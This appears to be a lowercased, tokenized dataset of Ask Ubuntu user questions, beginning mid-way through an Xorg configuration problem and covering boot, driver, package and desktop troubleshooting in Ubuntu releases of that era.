optional # option `` shadowfb '' # [ ] # option `` rotate '' # # option `` fbdev '' # # option `` debug '' # [ ] identifier `` card1 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ ] # option `` defaultrefresh '' # [ ] # option `` modesetclearscreen '' # [ ] identifier `` card2 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewpo rt 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection thanks venkat edit : moved a bunch of data from an answer section non-answer into the question : thanks for the reply . i have spent significant amount of time trying to install ubuntu on this new piece of hardware . none of the 11.10 64bit versions boot up for some reason . so i went ahead and installed server first and installed kde after the server installation was complete . besides the sudo apt-get install kubuntu-desktop i have not done much . i wonder if i missed any installations that are needed and this might be causing the problem . your thoughts ... . edit apologies . trouble with this output is i personally can not understand it as it does n't have any version info . so , i assumed output of lshw would have more info . output of lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) edit xrandr output : xrandr : failed to get size of gamma for output default screen 0 : minimum 1280 x 1024 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 77.0* edit yes , i have the external monitor hooked up . if i have it hooked up during start it defaults to the external one and shows only that . it not , it defaults to laptop screen and shows only that . edit march 04 2012 2:32 pm this the error startx gives me . x.org x server 1.10.4 release date : 2011-08-19 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-server x86_64 ubuntu current operating system : linux ubuntu 3.0.0-16-server # 28-ubuntu smp fri jan 27 18:03:45 utc 2012 x86_64 kernel command line : boot_image=/vmlinuz-3.0.0-16-server root=/dev/mapper/ubuntu-root ro noapic nomodeset build date : 19 october 2011 05:21:26am xorg-server 2:1.10.4-1ubuntu4.2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.22.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : sun mar 4 14:16:45 2012 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) no devices detected . fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help please also check the log file at `` /var/log/xorg.0.org '' for additional information . ddxsiggiveup : closing log xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error
109848	only one option from grub menu , is able to start ubuntu	everything was working fine in ubuntu 11.10 , but today suddenly the first option from grub menu , which normally boots ubuntu stopped working and i am left with a pink-color-screen only . if i select and boot from the options of previous linux version , then it works completely fine . i am not familiar with command line things , but if somebody could give me all the commands necessary , or any other possible solution , it would be very helpful to me . i have a dual-boot-system with windows 7
109853	installing of media players in ubuntu 9.04	is there any possibility to install vlc or any media player in ubuntu 9.04 ? ? if yes please help me ... ... .. as i tried to run a mpeg file , it shows 'the required software to play this file is not installed . you need to install suitable plugins to play media files. ' . as i tried to install the missing plugins , it shows some errors . please help me on this ?
109856	how to mount a windows folder in linux	i 'm running linux ( ubuntu 11.10 ) and windows ( 7 ) on the same system on two partitions . so i have this folder in windows : c : \users\me\folder and i created this folder in linux : /mnt/folder now trying to do something like this : sudo mount /media/acer/users/me/folder /mnt/folder this does n't work . i 'm guessing it has to do with that one can only mount a media and not folders . anyhow . is there some way to do this ?
109869	uninstalling package unrecognized by aptitude	some times ago i installed qtikz on my system , but i do n't remember if i did it via dpkg -i -- force-architecture or directly from source ( perhaps via checkinstall ) . in short , it is not working and i want to replace it with the qtikz 64 bit version of ubuntu precise ( i am using ubuntu natty ) . so i downloaded the package and did : sudo gdebi qtikz_0.10-1_amd64.deb which gives the error message : dpkg : error processing qtikz_0.10-1_amd64.deb ( -- install ) : qtikz : 0.10-1 ( multi-arch : no ) is not co-installable with qtikz : i386 0.10-1 ( multi-arch : no ) which is currently installed errors were encountered while processing : qtikz_0.10-1_amd64.deb then i tried to purge the old qtikz via aptitude : sudo aptitude purge qtikz , which gives me : no packages will be installed , upgraded , or removed . similar result with dpkg -r qtikz . aptitude search qtikz gives no results . and via apt-get i get : sudo apt-get purge qtikz reading package lists ... done building dependency tree reading state information ... done virtual packages like 'qtikz ' ca n't be removed locate qtikz results in /usr/bin/qtikz /usr/lib/mime/packages/qtikz /usr/share/qtikz /usr/share/applications/qtikz.desktop /usr/share/doc/qtikz /usr/share/doc/qtikz/changelog.debian.gz /usr/share/doc/qtikz/changelog.gz /usr/share/doc/qtikz/copyright /usr/share/kde4/apps/ktikz/locale/qtikz_de.qm /usr/share/kde4/apps/ktikz/locale/qtikz_es.qm /usr/share/kde4/apps/ktikz/locale/qtikz_fr.qm /usr/share/man/man1/qtikz.1.gz /usr/share/menu/qtikz /usr/share/mime/packages/qtikz.xml /usr/share/pixmaps/qtikz16.xpm /usr/share/pixmaps/qtikz32.xpm /usr/share/qtikz/documentation /usr/share/qtikz/locale /usr/share/qtikz/qtikz-128.png /usr/share/qtikz/templates /usr/share/qtikz/documentation/qtikz.qch /usr/share/qtikz/documentation/qtikz.qhc /usr/share/qtikz/locale/qtikz_de.qm /usr/share/qtikz/locale/qtikz_es.qm /usr/share/qtikz/locale/qtikz_fr.qm /usr/share/qtikz/templates/beamer-example-template.pgs /usr/share/qtikz/templates/template_example.pgs /usr/share/qtikz/templates/template_example2.pgs /var/lib/dpkg/info/qtikz.list /var/lib/dpkg/info/qtikz.md5sums /var/lib/dpkg/info/qtikz.postinst /var/lib/dpkg/info/qtikz.postrm so any ideas , how to savely remove this package ?
109872	join unallocated space with gparted	i need to join a 96.47gb partition with 155gb partition with `` gparted '' , without modify /dev/sda1 . how can i do it ? d : see screenshot of gparted window here sorry for my poor english , i 'm japanese xd
109878	how can i set up a uefi-partition and then install ubuntu 11.10 ( or higher ?	it is a great hassle to convert the mbr-partition to uefi after install and i only succeeded once , by pure luck : - ) trying to recreate what i have done before , i end up having my system completely re-formatted , the esp-partition included . the installer does n't take the esp-partition into account and i end up having a system which still uses the bios-legacy mode . my questions are ; should i make an install from my hp backup-dvds to have the original esp-partition installed and then install ubuntu ? if so ; how can i make the installer `` aware '' of the esp-partition and to make the installer take it into account to make use of it for ubuntu ? can i create a uefi-partition from scratch and then install ubuntu ? thank you in advance ! regards emanuel
109880	install new programs onto usb stick	hi i have made a working usb stick with ubuntu 11.10 and i think it 's excellent . i have installed some additional programs but they are gone whenever i next use the usb stick . how do i install new programs to the usb stick so that they stay there ?
109884	how can i install a canon pixma mg2140 printer/scanner ?	i have just got the printer/scanner . it was automatically detected , but no printer driver was found in the driver database for this particular model . searching turned up the following .deb - can i trust a driver from this site ? http : //www.driverlook.com/download/2880/canon-pixma-mg2140-mg2150-ij-printer-driver-linux-deb/
109885	how to install grub on the pbr instead of mbr ?	i own a mac and i want to install a triple boot . the problem is that i need to keep my windows bootloader to make sure that it works well with mac os . but i want ubuntu too and if i install ubuntu , it will install grub on the mbr . in previous versions of ubuntu , it was possible to choose where installing grub but i ca n't find it in ubuntu 11.10 . is there someone who knows how to do it ?
109895	automatic backup keep failing , how can i force it to run ?	deja dup keep failing to backup , giving the following error message : failed to read /tmp/duplicity-rrkall-tempdir/mktemp-xw6o6e-1 : ( < type 'exceptions.ioerror ' > , ioerror ( 'not a gzipped file ' , ) , < traceback object at 0x2172368 > ) the problem remains after deleting ~/.cache/deja-dup and also after restarting . is this a known problem ? is there a way to force the backup , other than deleting also the remote repository and starting the backup from scratch ?
109898	how to change the password of an encrypted lvm system ( done with the alternate installation ) ?	i installed ubuntu 11.10 with the alternate cd and encrypted the whole system ( except boot ) with the encrypted lvm . everything works great as before , but i would like to change the password of the encrypted lvm . i tried to follow the tips and tricks of this article , but it does not work . after typing : sudo cryptsetup luksdump /dev/sda5 it says : `` device /dev/sd5 does n't exist or access denied . '' i thought the encrypted partition is /dev/sda5 . any help how to change the password ?
109899	software center has disappeared	i 'm an absolute newby for linux / ubuntu . yesterday i installed ubuntu 11.10 on an old computer . it seemed to work fine . however today when i started the computer again the software center had disappeared ! ! it was n't in my starter list . when i used the dash button it was n't in my application list . in the dash center you can also look to applications ready to download and there it was , the software center . but how do i download the software center without software center ? double clicking , right clicking , nothing seems to work . how can i get back the software center , and how do i prevent it from disappearing in the future ?
109902	can i change the hud key ( alt ) ?	i am using the combination alt+shift to change the keyboard language ( eng - > greek and greek - > eng ) . since the introduction of hud , each time i press the keys alt+shift the hud ( search ) bar also appears . is there any way to change the activation key for hud ?
109904	how to disable/disconnect lan cable during startup	how to keep my lan ( ethernet ) connection disabled during startup.. coz when i login to system it is automatically enabled i dont want that due to some security reason . want howto in both ubuntu 10.04 and ubuntu11.10 regards , deena
109905	how to get rid of ubuntu 's `` no init found '' error message using windows ?	i been using ubuntu for a while and there are no problems but suddenly when i started ( technically booted ) my ubuntu i get a error message like this : no init found try passing init = bootarg //and some error messages follows it i 'm very new to ubuntu i do n't know how to get rid of this . i searched out this problem in google and i found that we can do solve it by using live cd and couple of steps in disk utility . the same disk check can be done in windows xp ? is it possible to do so ? since i have dual boot , i think it will be good to solve the problem in windows , rather than using live cd . thanks in advance .
109912	quality of webcam not as good as when running under windows	i have a dell inspiron 1520 laptop with a creative 2.0 mp webcam built-in , running on ubuntu 10.10 . earlier i was using windows vista which came pre-installed with my laptop . the quality of camera was very good , but now on ubuntu the quality of the webcam is really really bad ; any idea why that is so , and how to fix the problem ?
109913	shutdown menu option disappeared	using gnome classic . yesterday was normal ! ! ! have the shutdown button after the log out ... please see the picture . i appreciate the help
109923	how to add android x86 item to grub list ?	i have installed android from this topic , and when it ask me if i want to install grub i say no as it is installed when i setup ubuntu 11.10 , but the android item did n't appear in the grub list so how to add it to grub ? ? ?
109924	touchpad scrolling does n't work on a sony vaio vgn-nw220f	in windows 7 ( which was included on my laptop ) , i could use the right side of the touchpad to scroll vertically , and the bottom edge to scroll horizontally . in ubuntu , this does n't work and i see no setting to enable it . is it even supported ? i miss this feature . i just removed windows and installed ubuntu 12.04 beta . sony vaio vgn-nw220f
109925	use a printer and a scanner on same usb hub	ca n't print and scan from the same usb hub.. when i try to print it give me a error msg asking if i connected the printer.. when i check for my self if it is connected it is with command lsusb jeff @ studiopc : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 05e3:0606 genesys logic , inc. usb 2.0 hub / d-link dub-h4 usb 2.0 hub bus 004 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 004 device 003 : id 0040:073d bus 001 device 118 : id 03f0:2b17 hewlett-packard laserjet 1020 bus 001 device 039 : id 03f0:3f11 hewlett-packard psc-1315/psc-1317 when i try to add a new printer the lasterjet printer wont show up.. only the scanner so how do i configure so the printer will work ?
109929	how to add magnet links in the deluge webui ?	when adding a torrent in the deluge webui , the infohash button is disabled . how do i enable this function or what is the solution to add magnet links ?
109930	application for sharing mobile broadband with other computers ( hotspot )	i would like to know whether we have any application in ubuntu software center for sharing mobile broadband across other computers , making my computer act as wifi hotspot . if there are no applications for that , any link on how to achieve it will be helpful . i am running ubuntu 11.10 thanks
109935	are there any hardware diagnostic tools ?	i would like to perform a hardware check on my two desktops . are there any general-purpose hardware check tools for ubuntu that will check : the main board ide devices ( hard disks and cd players ) one of my desktops is about three years old and the other one is 10 years old .
109936	driver for wimax usb modem huawei bm338	list item i use ubuntu 11.04 but wimax usb huawei dont run in ubuntu . i cant anyway connect internet . please help me ? do you put deb file for me ?
109937	ubuntu starting with mute sound	my ubuntu is staring with the `` speaker '' signal in the alsa-mixer . everytime i boot my computer i have to go there and uncheck the `` mute '' checkbox . how can i make it unmute automatically so that i do n't have to do it manually everytime ? thanks .
109938	change hdd 's uuid	i did a small research before making the question , but i could n't find an answer.my question is how can i change the uuid ( universally unique identifier ) of a hard drive disk.i am asking this because every time i want to access a hard drive from terminal i have to find these random uuid which the system has generated automatically which are quite long.also , i want to know the dangers of making this kind of change .
109942	rearrange entries in the soundmenu	currently i have rhythmbox and spotify ( beta with apps ) installed on my 12.04 system . i use spotify a lot more than rhythmbox , and i would therefore prefer ( for ergonomical and aesthetic reasons ) that spotify was listed first . is there a way i can do this without removing rhythmbox ?
109944	highlight the first entry and replace “quiet splash” with “nomodeset”-how do i do that ?	the guide is from here : http : //thedaneshproject.com/posts/ubuntu-11-04-blank-screen-on-boot-solved/ can someone explain to me how do i do that ? thanks ! ( :
109948	mouse clicks only 50 % of the time	i 've just installed ubuntu 11.10 and everything seems fine , except the mouse clicks only work half the time . i often have to click things ( whatever it is ) several times before any response and it 's driving me crazy . the mouse works fine in windows xp . it also sometimes freezes at login screen . computer : asus cpu : amd sempron ( tm ) processor 3400+ graphics : nvidia geforce 6150se nforce 430 mouse : trust mi-2540d i 'm new to linux so i do n't know how to get all the data you might want , sorry about that , but tell me how and you shall have it .
109950	terminal non responsive after installing xampp in virtual machine and using sudo	i have just installed ubuntu 11 on virtual machine running on a windows seven , i just downloaded the xampp package and wanted to install it , so i googled how to install xampp , and it says i should login as a root user . so i typed sudo -s , and the it asked for a password , but suddenly i cant type nothing , even that the mouse works ? is that a common problem , does some know what it might be ? i looked on google could not find a similar problem ? i am following this instruction for the installation of xampp . http : //freshtutorial.com/install-xamp-ubuntu/
109954	tagging photographs	i am trying to organize my photographs with tags . the last time i have been doing this was about three years ago , so i have a lot of pictures to organize . all of the photographs should have correct exif tags for the time they were shot . i want to manually add tags for the people appearing in the photos . my requirements are simple . labels should be stored inside the photos themselves , in the form of iptc or xmp tags , and it should be easy to do mass tagging , say by selecting a bunch of photos and adding a common tag . since this task is mostly visual , i 'd rather not use command line tools . if possible , i would like to have the timing of the shot copied from exif to itpc or xmp , in order to have all tags in the same format . i have been trying to use shotwell for this , but it is rather annoying . shotwell wants me to import all the photos before being able to tag them , and this makes it difficult to go folder by folder and tag the pictures . it would be easier for me to tag the pictures beforehand and only then copy them into my main photo folder , which is where shotwell looks for new pictures . are there any good tools to tag photos ? i would need something like an easytag equivalent .
109955	freshly installed system boots slow - unable to understand kernel messages	when my ubuntu 10.04 pc stopped booting from one day to the next , i assumed that it is a boot loader problem . i managed to boot from a 11.10 live cd and installed a fresh 11.10 next to the old installation . that worked out , and i am able to mount the old partition and access its data without restrictions ( so far ) . all good - till the first reboot . the pc starts extremely slow ( 2min plus ) , with no visible activity during the boot process : dmesg [ 13.671431 ] addrconf ( netdev_change ) : eth1 : link becomes ready [ 19.616008 ] . [ 24.176004 ] eth1 : no ipv6 routers present [ 26.688016 ] ... ... ... ... ..not responding ... [ 124.639436 ] sd 4:0:0:0 : [ sdc ] read capacity failed [ 124.639439 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=did_ok driverbyte=driver_sense [ 124.639443 ] sd 4:0:0:0 : [ sdc ] sense key : not ready [ current ] [ 124.639447 ] sd 4:0:0:0 : [ sdc ] add . sense : logical unit is in process of becoming ready [ 126.661923 ] sd 4:0:0:0 : [ sdc ] test wp failed , assume write enabled [ 128.684411 ] sd 4:0:0:0 : [ sdc ] asking for cache data failed [ 128.684451 ] sd 4:0:0:0 : [ sdc ] assuming drive cache : write through ( see full output here . ) from googling around i found references to possibly missing udev rules , something i almost completely do n't understand . but as the whole story started with a failing boot loader , i can not rule out that i have a general problem accessing the hard drive . what irritates me is the fact that the disk seems completely accessible after the boot process completed ( smart dialog / selftest : all good ) : i bought the disk about a year ago , did not have any issues with it since then . can someone shed light on what is happening and how to resolve it ? update : writing this , i recall that booting into the live-cd took ages too . so i assume that from the very first moment on when the problems occurred , i 'm having this ( kernel ? ) issue . update2 : my pc is a desktop with intelâž coreâ˘2 quad cpu q9650 @ 3.00ghz & 8 giga ram on a gigabyte ep35c-ds3r main board . running on linux since day one of its existence : - ) update3 : ( @ githlar ) the message actually repeats once . i posted the whole output here . update4 tried to change bios to ahci ( raid / ahci / disabled , was disabled before ) - no change update5 bought a new disk , installed new ubuntu - same result ( same error , different timing ) . this seems to rule out the disk and bring the mainboard into attention , what do you guys think ?
109956	no notification sound with empathy	i 'm using ubuntu oneric with empathy 3.2.0.1 and gnome-shell 3.2.2.1-0ubuntu0.1 . when i use empathy with unity , i receive a notification sound every time someone send me a message . but when i use empathy with gnome-shell , i only receive a visual notification on the bottom-center of the screen , without any sound . does anyone know why this is happening ?
109957	how to change the root password on ubuntu 11.10 ?	i am using bash . i have a freshly installed ubuntu 11.10 and i need to change the password .
109960	it is possible to change the icon theme on a remastered live cd ?	writing a *.override file in /usr/share/glib-2.0/schemas doesn change anything . if i edit the xml file the system will crash .
109964	can ubuntu 11.10 be installed on a 1t hard drive ?	i tried to install ubuntu 11.10 on a gateway machine and an acer machine . in each case , i tried the same 1t hard drive . however , after the install , neither the gateway nor the acer would boot up to the ubuntu log on screen - both stopped at the terminal , with a flashing underscore . ubuntu worked fine on the acer with a 320g hard drive . will ubuntu 11.10 install on a 1t hard drive ?
109971	how do i run firefox nightly on 10.10 ?	how does one install firefox nightly on ubuntu maveric ( 10.10 ) ? this is what i have done so far sudo add-apt-repository ppa : ubuntu-mozilla-daily/ppa sudo apt-get update sudo apt-get install firefox-trunk i get the following error : unable to locate package firefox-trunk here is a log of the update command , in which it has s surprising ign next to mozilla daily ppa .
109974	need a cd ripping program that allows manually editing track titles	i have reviewed other answers such as what are good cd ripping programs ? . i did n't find my solution yet . the solution i seek : i want to enter or edit track titles and album info manually in the gui before i start ripping . i 'm using rubyripper and it has this feature , but rubyripper is way too slow my current situation . i 'm ripping some new audio books i just purchased . they are typically not found the the cddb and some discs do n't show any track titles in the ripping software . so i want to enter this info manually . an alternative solution might be some way to organize the file names after ripping . i 'm open to suggestions on that . so far , my attempts to do that have indicated it will be too time consuming and error-prone . so my question is really focused on using the gui of the ripping software . i 'm also open to using scripts and command line tools -- but only if it is faster and more efficient . speed and efficiency count in this task . for example , i 'd want to be able to just paste all track titles into a config file , not have to do painstaking editing of a complex command for each cd . the reason why rubyripper is not appropriate is because the original recording quality is not that great . it sounds like the speaker 's microphone is rubbing on paper or maybe his clothing at times . i think this causes rubyripper problems . some tracks can not be `` corrected '' after the maximum trials . but with this poor original quality , i do n't care about rubyripper 's efforts at achieving perfection . and i ca n't seem to set the preferences to completely turn off this matching . ( the lowest value is 2 and that 's what i 've been using . ) if i 'm ripping classical music , i absolutely want to use rubyripper ( or maybe abcde ) . but for my current 32 cd audio book ( and similar situations ) neither of those options are appropriate . it took all day to rip just 5 of the 32 cds from the first of many audio books . at that rate , this project will take months . it should take a day , max . edit/update : i 'm still looking for the ideal solution . i have n't found it . in the mean time , here 's what i 'm doing . i 'm using asunder for quick and simple ripping . i 'm not editing track names at the ripping stage . next i 'm using easy tag to edit the tags as well as track names ( and even file names ) . easy tag basically solved my problem , but in a way i had n't anticipated . finally , if i need more precise changes to the file names , i 'm using `` rename '' on the command line . this is the most efficient approach i have found so far . i 'll probably finish this project using this approach .
109977	blank screen but can still hear sounds ?	cpu : amd k14 ram : 4.00 gb ddr3 @ 671mhz ( 9-9-9-24 ) motherboard : quanta 2ac7 ( cpu 1 ) graphics : hp omni 120 ( 1600x900 @ 60hz ) amd radeon hd 6320 graphics i am trying to install ubuntu 11.10 inside windows . when i boot up , i click esc and it takes me to the menu to choose which option i want . i choose 'demo mode ' , just to see if it would come up - it did not . i replaced 'quiet splash ' , with 'nomodeset ' , then booted it . a bunch of text comes up on screen , then it goes black . about 15 seconds later , i can hear the login sound playing , but it is a completely black screen . i can press my volume buttons on my keyboard , and i can hear it making a sound when i turn it up . if it is a brightness problem ( which i do n't think it is ) , i have no way to increase brightness from my keyboard , nor monitor . i 'm not sure what 's wrong , but it 's bugging me ! any help would be greatly appreciated . thanks
109983	macbook pro 8,1 - wireless interface not showing up	i 've installed ubuntu 11.10 on my macbook pro 8,1 . everything went fine and everything installs fine except for the wireless interface . i 've installed the b43 module according to these instructions : https : //help.ubuntu.com/community/macbookpro8-1/natty # wireless i 've tried compiling the module , ndiswrapper and also the last solution mentioned using this ppa : ppa : zwaldowski/ppa . with the three solutions , the module loads finely . it works smoothly . lspci shows the wireless card without problem . but there is no wireless interface . iwconfig or ifconfig both show eth0 and lo as interfaces , but no eth1 or wlan0 interface is showing up . i have no idea why , and i 'm completely stuck there .
109984	i want to reset chat option ( upper right corner of the screen )	i tampered with it and chose yahoo messenger and then did n't add any more options and now i want to add something else but i ca n't manage to find how . is there a way to do it or i have to reinstall ubuntu ?
109985	why must i do ` . .bash_profile` every time i create a new alias ?	every time i add a new alias in my .bash_profile file , i found that i must do the command . .bash_profile in my terminal to make it work . why does the alias not work automatically ?
109986	ubuntu on usb does not boot on macbook	ubuntu is installed on a 32 gigabyte flash-drive and it successfully booted every time up until i partitioned my hard-drive and installed windows as a secondary boot ( for programming reasons ) . now every time i attempt to boot the ubuntu flash-drive it boots into windows xp . the same goes for partitions , i partitioned my hard-drive and installed ubuntu and it only booted windows xp . i am on a macbook 6,1 with mac os x 10.6.8 , 2 partitions , and i am using refit as my boot-loader . edit : i had ubuntu working fine from flash drive and at one point as a partition . i later uninstalled ubuntu from my hard-drive and installed windows . i then had to re-image my computer for certain reasons and i installed windows . now when i attempt to boot anything other than windows or os x it boots into windows . ubuntu was never on my hard drive while ubuntu was on it . the flash-drive has been its own thing and has the boot-loader installed to it and loads from refit but boots into windows .
109990	how add a second unity launcher ?	how can i add a second unity launcher to my ubuntu 11.10 ? it could be possible , because someone have accidentaly done it ... this is not a duplicate of this post - it was about ubuntu 11.04 and i 'm asking about 11.10 ( there were many changes between .04 and .10 )
109994	dpkg : error : parsing file '/var/lib/dpkg/status ' near line 6449	good evening . this problem occured when trying to update using the update manager . a problem occured so i cleared all the cache and tried to update once again this time in terminal , and it spat out : dpkg : error : parsing file '/var/lib/dpkg/status ' near line 6449 missing package name after opening up 'status ' with gedit and going to line 6449 , i found that nothing was on that line but the following was before and after it . this package contains the mono system.configuration library for cli 4.0 . original-maintainer : debian mono group < pkg-mono-group @ lists.al ) oth.debian.org > homepage : http : //www.mono-project.com/ < < < < -- -- line 6449 package : bzip2 status : install ok installed priority : optional section : utils installed-size : 160 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > < < < < -- - line 6449 is obviously not on the file , but i ca n't see whats wrong here ? anybody have an idea ? thanks ! edit : i have tried running : sudo apt-get install -- fix-missing sudo dpkg -- clear-avail but no good ...
109998	preserve my downloads	i use a usb drive to boot ubuntu and when i download my preferred language it is n't kept for me to the next time i boot ubuntu , so every time that i boot ubuntu , i need to download my preferred language again . is there any way to preserve my language and other applications that i downloaded at the last boot to the next time i boot ubuntu from my usb driver ? thanks in advance ! ! atar .
109999	mac on linux , is it legal ?	while browsing i found an interesting tool in sourceforge.net it says mac-on-linux is a linux/ppc program that virtualizes macos or macosx in linux . is it legal ? if yes how to install it in ubuntu ?
110000	how to print a web page that contains flash	i am using the chromium browser to display the following web page : http : //www.primaryworksheets.co.uk/multiws/multi23.html i want to print off this maths worksheet for my son , but all i ever get out of my printer is a blank page . the web page appears to be produced using flash . i have been to the software centre and re-installed the flash plugin , but that did not help . i do n't seem to have problems printing anything else . firefox is n't any better . can anyone tell me what else i might try ? i 'm using '11.04 ' . thanks , richard
110004	why wont locate find text within files from catfish ?	i am using catfish . the locate backend wont find text within files . i already ran `` sudo updatedb '' . what is wrong ?
110005	windows 7 does n't show up in grub after installation	so , i installed ubuntu 10.10 in my computer . i already had windows 7 installed beforehand . i have 2 drives . an 80gb ssd and a 500gb hdd . ubuntu is installed in part of the hdd . windows 7 is installed in the ssd . however , the windows 7 boot option does n't show up in grub . i tried to update it and it did update but nothing happened . so i am wondering if i can add it manually somehow . here is the df -h i ran . filesystem size used avail use % mounted on /dev/sdb1 138g 3.8g 127g 3 % / none 7.9g 296k 7.9g 1 % /dev none 7.9g 856k 7.9g 1 % /dev/shm none 7.9g 92k 7.9g 1 % /var/run none 7.9g 0 7.9g 0 % /var/lock /dev/sda1 75g 57g 18g 76 % /media/blinkssd
110026	how do i finetune subpixel font anti-aliasing ?	after a recent tour through gnome3 , kde and unity my font anti-aliasing in xfce4 has changed in a subtle way ( not sure if it was any of the des that changed the setting or any of the dependencies that got install when installing the des ) : the font , verdana 8 , looks almost exactly the same , except in the old one subpixels where used to make the lines a little wider in the new one they are just one-pixel . which setting does cause this effect and how can i set it back ? it 's neither the hinting nor the subpixel ordering , which are the only settings reachable from xfce4 . edit : when i create a new account without any existing configuration i get the old subpixel rendering back .
110027	ubuntu one stopped working - `` attributeerror 'nonetype ' object has no attribute 'get_rootdir ' ''	this stopped working suddenly on my win7 pro sp1 machine ; stalls on getting info , then asks to close . only tab that works without quitting is my devices tab . my other devices , working , are winxp , ubuntu 10.4 , and iphone .
110028	added folders to path can not be found using sudo	i 've added a new folder to my path , but when running the programs ( in that folder ) with `` sudo '' it does not work . when i type sudo < command-name > it returns : sudo : < command-name > : command not found how do i make it available for sudo ?
110030	asus g53sw weird touchpad behaviour	my friend has a new asus g53sw notebook with ubuntu oneiric installed . sometimes the touchpad is weird and hangs around or you ca n't click on things . it 's quite unusable . how can i fix this weird behaviour , are there any `` drivers '' for the touchpad ?
110033	what is the correct way of proposing design changes to unity ?	i recently decided to give unity another try after moving to gnome shell for the past cycle . i have had a simple idea which i think would greatly improve unity 's multitasking ability just by changing the way icons are ordered on the launcher . what is the best way to propose the idea to someone who may have some influence on the actual design of unity ? i posted on brainstorm but the mod said i would be better off `` getting involved '' in the design process . i dont really have the time for that .
110036	turning on and off hp probook 4530s touchpad	i installed ubuntu 11.10 on my hp laptop and among some problems , one of which i 'm trying to solve is the touchpad problem . it 's working , but how can i turn on/off it ? in suse linux enterprise desktop ( which was preinstalled ) and windows , the touchpad is enabled/disabled by touching the left upper corner , when small diode is situated . in ubuntu , i touched that area many times , but nothing happened . do anybody know how to solve the problem ?
110040	apache - 403 forbidden - changed dir for default in sites-available	i 'm sorry if this is a repeated question , but i have tried all the possible solutions from the other answers ... i just installed apache , php5 , ... , the works i can access http : //localhost and get the apache index.html located at /var/www i did the following : in sites-available : sudo cp default mydefault opened it and got this : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > so i changed documentroot /var/www to my folder and < directory /var/www > to my folder . inside this directory tag , i changed allow override to all and inserted directoryindex index.html index.php i saved , and ran sudo chmod 755 /mydirectory sudo a2dissite default & & sudo a2ensite mydefault sudo service apache2 restart and still get 403 forbidden when accessing http : //localhost any help wil be appreciated , thanks
110041	why does inkscape become unresponsive all of the sudden and how can i stop it from happening ?	i 've just started using inkscape in ubuntu 11.10 and i 'm not sure what exactly triggers it , but at some point , the inkscape viewport becomes unresponsive . the viewport is still visible . i can still manipulate the window itself : move , resize , open menu items at top . the cursor switches style . but clicking on anything within the viewport has no effect . i must close the file and restart in order to regain control .
110042	how to re-install kde splash screen with tty1	i accidentally uninstalled the splash screen i was using in kubuntu 11.10 and now it takes me to tty . can any body tell me how to re-install the kde splash screen so i can login and use my computer again ? ( i was using the default theme which is `` horos '' but it does n't matter what theme is re-installed as long as it works . )
110044	is there a way to configure inkscape to use whole numbers in the interface rather than decimals for common properties ?	i do n't need that much precision most the time and i prefer , for example , to see 100,100 for x , y or width , height values rather than 100.224,100.082 .
110054	where did the notes feature go ?	i had been using the notes feature in the web interface of one.ubuntu.com . i no longer see that notes feature in the interface . have my notes been deleted ? i had important information there that ca n't be reproduced .
